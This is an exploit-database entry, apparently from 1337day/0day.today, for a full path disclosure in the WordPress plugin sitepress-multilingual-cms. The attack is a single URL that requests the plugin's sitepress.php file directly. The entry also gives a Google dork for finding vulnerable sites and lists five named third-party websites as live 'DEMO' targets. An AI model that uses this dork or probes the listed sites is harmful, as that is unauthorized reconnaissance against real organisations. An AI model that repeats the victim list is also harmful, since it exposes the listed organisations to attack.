id: 20067
date: 12/30/2012
title: Wordpress plugins sitepress-multilingual-cms Full Path Disclosure
author: The Black Devils
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Wordpress plugins- sitepress-multilingual-cms Full Path Disclosure vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork:inurl:"sitepress-multilingual-cms"
# Type : php
# Tested on: [Windows] & [Ubuntu]


http://Localhost/wp-content/plugins/sitepress-multilingual-cms/sitepress.php


DEMO
http://www.clinique-montaigne.fr/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://piwik.org/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://iamvery.bip-bip.fr/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://www.4gsecure.fr/test/wp-content/upgrade/sitepress-multilingual-cms.tmp/sitepress-multilingual-cms/sitepress.php
http://www.dahabtravel.eu/wp/wp-content/plugins/sitepress-multilingual-cms/sitepress.php


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2023-03-24]  #